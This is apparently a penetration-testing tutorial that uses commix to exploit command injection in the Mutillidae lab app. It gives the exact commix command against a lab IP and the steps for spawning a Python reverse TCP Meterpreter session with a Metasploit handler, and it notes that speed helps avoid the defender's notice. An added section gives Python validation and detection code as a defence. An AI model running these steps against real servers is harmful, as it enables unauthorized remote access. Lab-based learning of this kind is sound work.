Command Injection to Metasploit Meterpreter with Commix

Hi everyone,

I would like to write a short review of the command injection tool commix. I found this tool really helps me get the job done faster.

As you know, during an OWASP penetration test, exploiting a vulnerability until we get a shell can take some time. Taking too long to get access to the remote server's shell will get your activity noticed by the defender.

Commix is a tool that helps you test and exploit command injection. Using it shortens the time needed to exploit the flaw and get shell access. Its most important feature is that it can generate a reverse TCP payload for Metasploit, which opens the way to a much more advanced framework.

I will guide you through using commix against the command injection vulnerability in the Mutillidae web testing application.

Install commix

  1. Run your Kali Linux
  2. Open the console
  3. Run git clone https://github.com/commixproject/commix.git
  4. Go to the commix directory

Exploit the web

  1. Chain your web browser to Burp Suite.
  2. Go to the command injection section in Mutillidae: http://192.168.5.130/mutillidae/index.php?page=dns-lookup.php
  3. Analyze the command injection point in Burp.
  4. Based on the request seen in Burp, the injection point would be at target_host=hostname&&INJECTION_POINT&dns-lookup-php-submit-button=Lookup+DNS
  5. We can now start commix to exploit this bug with the following command:
    commix --url="http://192.168.5.130/mutillidae/index.php?page=dns-lookup.php" --data="target_host=detik.com&dns-lookup-php-submit-button=Lookup+DNS"
  6. If you have reached that point, then your OS shell has been successfully built.
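
For the defending side of the injection point in target_host, here is an added example (not from the original post, and not Mutillidae's or commix's own code) of how a DNS-lookup handler can validate the field and run the lookup without a shell, plus a check that flags request bodies carrying anything other than a hostname. It is written in Python rather than the application's PHP; the function names, the use of nslookup and the sample request bodies are assumptions made for illustration.

```python
import re
import subprocess
from urllib.parse import parse_qs

# One RFC 1123 label: letters, digits, hyphens; 1-63 chars; no edge hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def is_valid_hostname(value):
    """Allow-list check for the target_host form field."""
    if not value or len(value) > 253:
        return False
    if value.endswith("."):  # tolerate one trailing root dot
        value = value[:-1]
    return all(_LABEL.fullmatch(label) for label in value.split("."))


def build_lookup_argv(target_host):
    """Return the argv for the lookup; raise ValueError on anything else."""
    if not is_valid_hostname(target_host):
        raise ValueError("target_host is not a valid hostname")
    # A list argv means no shell parses the value, so shell operators
    # such as && stay inert even if validation were ever bypassed.
    return ["nslookup", target_host]


def dns_lookup(target_host, timeout=5.0):
    """Run the lookup without a shell and return its output."""
    argv = build_lookup_argv(target_host)
    done = subprocess.run(argv, capture_output=True, text=True,
                          timeout=timeout, shell=False)
    return done.stdout


def request_is_suspicious(post_body):
    """Detection side: flag a POST body whose target_host fails validation."""
    fields = parse_qs(post_body)
    return any(not is_valid_hostname(v) for v in fields.get("target_host", []))


if __name__ == "__main__":
    # Constructed request bodies modelled on the form fields in the post.
    samples = [
        "target_host=detik.com&dns-lookup-php-submit-button=Lookup+DNS",
        "target_host=detik.com%26%26INJECTION_POINT"
        "&dns-lookup-php-submit-button=Lookup+DNS",
    ]
    for body in samples:
        print(request_is_suspicious(body), body)
```

The same allow-list can back a WAF or log-review rule: any target_host value that is not a plain hostname is worth an alert on this form.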

 

Start metasploit

  1. After your shell is built, you can activate Metasploit by typing reverse_tcp
  2. set LHOST <type your kali linux IP>
  3. set LPORT <type your server port>
  4. Type 2 for other reverse TCP shells
  5. Type 9 for the Python reverse TCP shell
  6. It will generate the Metasploit Meterpreter and wait for the Metasploit handler file to be generated
  7. Open another console and type the command generated by commix
  8. In my case the command is msfconsole -r /usr/share/commix/py_meterpreter.rc
  9. After the Metasploit multi handler starts, press any key in commix to start the reverse TCP connection and Meterpreter
  10. Yeah .. the Metasploit Meterpreter is initiated

As you can see above, this is the whole process from command injection to Meterpreter deployment in Metasploit.

Hope this will help you all. Thanks.
